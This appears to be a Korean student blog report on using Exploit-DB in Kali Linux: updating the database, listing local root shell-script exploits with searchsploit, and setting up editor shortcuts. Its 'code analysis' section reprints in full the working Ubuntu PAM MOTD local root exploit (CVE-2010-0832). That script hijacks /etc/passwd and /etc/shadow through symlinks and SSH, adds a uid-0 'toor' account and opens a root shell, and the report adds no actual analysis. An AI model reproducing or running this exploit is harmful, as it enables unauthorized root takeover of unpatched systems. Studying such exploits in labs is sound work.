쉘 스크립트 코드 분석
INDEX
------------------------------
1. 네트워크 설정 확인
2. Exploit DB 업데이트
3. 공격용 쉘스크립트 검색
4. 편리한 기능 설정
5. 코드 분석
------------------------------
■ 사용시스템
- KaliLinux
(1) 네트워크 설정 확인
Exploit DB 업데이트 작업을 하기 위해서 네트워크 설정을 확인한다.
외부로 통신이 가능해야 한다.
# ifconfig
# netstat -nr
# cat /etc/resolv.conf
# nslookup www.daum.net
(2) exploit DB 업데이트
# ls /usr/share/exploitdb/platforms
aix cfm irix minix palm_os tru64 android cgi java mips php ultrix arm freebsd jsp multiple plan9 unix asp freebsd_x86 lin_amd64 netbsd_x86 qnx unixware atheos freebsd_x86-64 lin_x86 netware sco webapps beos generator lin_x86-64 novell sco_x86 win32 bsd hardware linux openbsd sh4 win64 bsd_ppc hp-ux linux_mips openbsd_x86 solaris windows bsd_x86 immunix linux_ppc osx solaris_sparc bsdi_x86 ios linux_sparc osx_ppc solaris_x86 |
# git clone https://github.com/offensive-security/exploit-database
약 5 ~ 10분정도 걸린다.
(3) 공격용 코드 중 쉘스크립트 검색
# searchsploit linux local | egrep '.sh' | grep Root
dump 0.4b15 Local Root Exploit | /linux/local/193.sh vixie-cron Local Root Exploit | /linux/local/203.sh CDRDAO Local Root Exploit | /linux/local/434.sh Operator Shell (osh) 1.7-12 Local Root Exploit | /linux/local/788.pl Exim <= 4.42 Local Root Exploit | /linux/local/796.sh Linux Mandrake <= 10.2 cdrdao Local Root Exploit (unfixed) | /linux/local/997.sh Operator Shell (osh) 1.7-13 Local Root Exploit | /linux/local/1154.pl Qpopper <= 4.0.8 (poppassd) Local Root Exploit (linux) | /linux/local/1229.sh Operator Shell (osh) 1.7-14 Local Root Exploit | /linux/local/1300.sh Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (4) | /linux/local/2011.sh Rocks Clusters <= 4.1 (mount-loop) Local Root Exploit | /linux/local/2016.sh liblesstif <= 2-0.93.94-4mdk (DEBUG_FILE) Local Root Exploit | /linux/local/2144.sh Openswan <= 2.4.12/2.6.16 Insecure Temp File Creation Root Exploit | /linux/local/9135.sh Ubuntu PAM MOTD Local Root Exploit | /linux/local/14339.sh systemtap - Local Root Privilege Escalation Vulnerability | /linux/local/15620.sh Calibre E-Book Reader Local Root Exploit | /linux/local/18064.sh Calibre E-Book Reader Local Root Exploit | /linux/local/18071.sh Calibre E-Book Reader Local Root Race Condition Exploit | /linux/local/18072.sh Sudo 1.6.3 Unclean Environment Variable Root Program Execution Vulnerability | /linux/local/21227.sh H-Sphere Webshell 2.4 - Local Root Exploit | /linux/local/22128.c |
(4) 편리한 기능 설정
코드를 분석할 스크립트는 다음과 같다."Ubuntu PAM MOTD Local Root Exploit | /linux/local/14339.sh"-> /usr/share/exploitdb/platforms/linux/local/14339.sh
# vi ~/.bashrc
..... (중략) ..... # # Sfecific Configuration # export E=/usr/share/exploitdb/platforms |
# . ~/.bashrc
# vi $E/linux/local/14339.sh
or
# vi ~/.bashrc
..... (중략) ..... E() { vi /usr/share/exploitdb/platforms$1 } |
# . ~/.bashrc
# E /linux/local/14339.sh
or
# vi E.sh
#!/bin/bash
vi /usr/share/exploitdb/platforms$1 |
# E.sh /linux/local/14339.sh
(5) 코드 분석
# E /linux/local/14339.sh
#!/bin/bash # # Exploit Title: Ubuntu PAM MOTD local root # Date: July 9, 2010 # Author: Anonymous # Software Link: http://packages.ubuntu.com/ # Version: pam-1.1.0 # Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx) # CVE: CVE-2010-0832 # Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i # References: http://www.exploit-db.com/exploits/14273/ by Kristian Erik Hermansen # # Local root by adding temporary user toor:toor with id 0 to /etc/passwd & /etc/shadow. # Does not prompt for login by creating temporary SSH key and authorized_keys entry. # # user@ubuntu:~$ bash ubuntu-pam-motd-localroot.sh # [*] Ubuntu PAM MOTD local root # [*] Backuped /home/user/.ssh/authorized_keys # [*] SSH key set up # [*] Backuped /home/user/.cache # [*] spawn ssh # [+] owned: /etc/passwd # [*] spawn ssh # [+] owned: /etc/shadow # [*] Restored /home/user/.cache # [*] Restored /home/user/.ssh/authorized_keys # [*] SSH key removed # [+] Success! Use password toor to get root # Password: # root@ubuntu:/home/user# id # uid=0(root) gid=0(root) groupes=0(root) # P='toor:x:0:0:root:/root:/bin/bash' S='toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:99999:7:::' echo "[*] Ubuntu PAM MOTD local root"
[ -z "$(which ssh)" ] && echo "[-] ssh is a requirement" && exit 1 [ -z "$(which ssh-keygen)" ] && echo "[-] ssh-keygen is a requirement" && exit 1 [ -z "$(ps -u root |grep sshd)" ] && echo "[-] a running sshd is a requirement" && exit 1 backup() { [ -e "$1" ] && [ -e "$1".bak ] && rm -rf "$1".bak [ -e "$1" ] || return 0 mv "$1"{,.bak} || return 1 echo "[*] Backuped $1" }
restore() { [ -e "$1" ] && rm -rf "$1" [ -e "$1".bak ] || return 0 mv "$1"{.bak,} || return 1 echo "[*] Restored $1" } key_create() { backup ~/.ssh/authorized_keys ssh-keygen -q -t rsa -N '' -C 'pam' -f "$KEY" || return 1 [ ! -d ~/.ssh ] && { mkdir ~/.ssh || return 1; } mv "$KEY.pub" ~/.ssh/authorized_keys || return 1 echo "[*] SSH key set up" } key_remove() { rm -f "$KEY" restore ~/.ssh/authorized_keys echo "[*] SSH key removed" } own() { [ -e ~/.cache ] && rm -rf ~/.cache ln -s "$1" ~/.cache || return 1 echo "[*] spawn ssh" ssh -o 'NoHostAuthenticationForLocalhost yes' -i "$KEY" localhost true [ -w "$1" ] || { echo "[-] Own $1 failed"; restore ~/.cache; bye; } echo "[+] owned: $1" } bye() { key_remove exit 1 } KEY="$(mktemp -u)" key_create || { echo "[-] Failed to setup SSH key"; exit 1; } backup ~/.cache || { echo "[-] Failed to backup ~/.cache"; bye; } own /etc/passwd && echo "$P" >> /etc/passwd own /etc/shadow && echo "$S" >> /etc/shadow restore ~/.cache || { echo "[-] Failed to restore ~/.cache"; bye; } key_remove echo "[+] Success! Use password toor to get root" su -c "sed -i '/toor:/d' /etc/{passwd,shadow}; chown root: /etc/{passwd,shadow}; \ chgrp shadow /etc/shadow; nscd -i passwd >/dev/null 2>&1; bash" toor |
'Learning > └보고서' 카테고리의 다른 글
DNS Spoofing report (0) | 2016.12.27 |
---|---|
Yasca program Report (0) | 2016.12.27 |
Shell Scripts Report (0) | 2016.12.11 |
Googling Report (0) | 2016.12.10 |